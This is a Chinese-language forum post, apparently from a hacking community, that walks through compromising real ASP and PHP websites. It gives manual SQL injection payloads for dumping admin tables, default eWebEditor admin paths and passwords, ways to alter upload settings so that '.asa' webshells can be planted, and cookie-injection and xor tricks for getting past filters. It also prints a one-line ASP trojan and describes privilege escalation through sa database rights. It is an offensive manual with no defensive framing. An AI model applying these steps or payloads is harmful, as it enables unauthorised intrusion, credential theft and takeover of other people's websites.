TA的每日心情 | 开心 2017-8-20 11:43 |
---|
签到天数: 81 天 [LV.6]常住居民II
|
1.找到注入点以后,先用明小子或者啊D扫后台,找到后台后再猜解用户名和MD5加密的密码
MD5解密可以到www.cmd5.com等网站去解密。
得到解密后的密码后,进后台,然后就是找有没有数据库备份,有数据库备份则上传图片格式的小马,然后数据库备份。如果没有数据库备份包,得到上传路径和cookie,然后用明小子的综合上传——动力上传漏洞——图片上传,上传小马。
2.前面已经讲过关于ewebeditor编辑器漏漏洞的利用了
详细请看 http://www.exehack.net/328.html
默认后台地址:/ewebeditor/admin_login.asp默认密码:admin,admin;admin,admin888
默认样式设计路径:/ewebeditor/admin_style.asp
默认数据库路径:/db/ewebeditor.mdb
进入编辑器后,进入样式管理:
1.路径模式->绝对根路径
2.图片类型->asa
3.提交后点击设置此样式下的工具栏,点击新增工具栏->可选按钮中选择插入或修改图片->保存设置
4.点击返回样式管理->预览->上传图片->上传成功后选择(代码)
当数据库为只读,新增样式失败,然后利用http://网址/ewebeditor/admin_uoloadfile.asp?id=14&dir=.. (dir为列目录,..为返回上层目录),
形式:dir ../.. 进入网站目录后下载数据库
当MD5破解不了,可以试着去下载数据库,也可以在ewebsditor_style中查看是否有前人留下的东西,然后记下id和s_name.
例如id=48,s_name=asdasd,则构造成ewebeditor.asp?id=48&style=asdasd 然后在浏览器中输入:http://网址/ewebeditor/ewebeditor.asp?id=48&style=asdasd,然后上传asa的小马.
3. 用啊D和明小子发现注入点为DB权限时,可以用穿山甲看一下是否为sa权限,
如果为sa权限时,则可以直接用穿山甲的CMD命令提权.
如果工具扫不到注入点,但用手动检测发现防注程序,则用注入中转.
在注入中转生成器中选择”cookie注入”,然在”注入URL地址”中输入注入点”?id=”前的网址,例如:http://127.0.0.1/newshouse/show.asp
注入键名中输入例:id=,POST提交值:imdcw=中输入id值,例imdcw=40,然后将生成的网页放入搭建环境中.
接着DB权限列目录:在穿山甲的文件管理,然后逐步列举找网站目录找到网站目录后,在浏览器中输入目录中的一个页面来验证找到的是否为网站目录.
找到正确的网站目录后,用Getwebshell软件得到一句话木马.在Getwebshell的路径应为网站目录.例:freehostlsfffcomwebdb.asp.在地址中写注入地址,代码:<%exexute(request(“a”))%>中a为一句话木马密码.在Getwebshell中逐步完成后,用一句话木马客户端上传木马.
4 . 在注入中转后,放在本机建的网站环境中,然后用明小子,啊D或着穿山甲来猜表,得到用户名和密码,工具栏中输入http://127.0.0.1/…
防注入程序可能值过滤and ; ‘ ,不过滤or,xor,select,且可能不过滤大小写转换后的值.
5.从旁注入,当工具扫不到注入点,或者进不了网站的后台,则可以用旁注.
旁注可以用明小子,在旁注检测中输入域名,然后点”>>”,得到IP,然后再查询该IP上所有网站,查询到所有网站以后,点击SQL注入,
然后批量扫描注入点->载入 查询网址->批量分析注入点
如果工具查找不到后台,可以用谷歌和百度来搜索,各格式为site:网址 intitle:后台/管理
进入webshell后,测试网站是否支持aspx,因为aspx的权限更大,容易提权.如果aspx大马上传失败,可以用aspx的测试文件,替换其中的内容.
6. 手工注入asp:在网址后面加’,返回错误也面
and 1=1,返回正常页面
and 1=2,返回错误页面
and exists (select * from admin) 猜数据库中有无admin表段,返回正常页面则表明有admin这个表.
order by 数字 猜字段数,数字不断增加,直到返回错误页面前的数字就是字段数.
and 1=2 union select 1,2,3,4,5,…,n(n为字段数) from admin (admin为已有表段)
然后就是猜用户名和密码,例username,password.一般将username和password替换上一页面显示数字的地方.
例:and 1=2 union select 1,2,username,4,5,password,7,…,n from admin
当得到用户名和密码,进入后台后,如找不到数据库备份,
使用上传时,提示图片小马上传成功时,要注意上传地址,如果写着是”首页图片新闻图片地址”,则到网站首页,选择一个首页图片单击属性,得到文件路径.
如果上传不成功,则抓包,如果抓包也失败,则在后台源代码找一下是否为ewebeditor编辑器,通过ewebeditor常见漏洞上传.
如果网址过滤 and 1=1 1=2 ‘,则用xor,xor 1=1 返回错误;xor 1=2 返回正常.
详细请看:http://www.exehack.net/490.html
7. 手工注入PHP:
用order by 数字,猜字段数,如果数字到了1还报错,则直接猜字段.用and 1=2 union select 1,2,3,…,n,直到n返回正确页面.
version() 查看版本,用法:替换数字.
user() 查看权限,用法:替换数字.
如果显示root权限,则可以用loadfile()函数
然后则是猜表名,用到table_name和information_schma.tables
用法:and 1=2 union select 1,2,table_name,4,5,…,n from information_schema.tables
然后网页会列出所有表名,接着就是寻找敏感的表名.
猜列名和猜表名差不多,用到column_name和information.colums
用法:and 1=2 union select 1,2,colum_name,4,5,…,n from information_schema.columns
得到用户名和密码字段后,就构造语句查询其内容
用法:and 1=2 union select 1,2,用户名,密码,…,n from 表名 |
|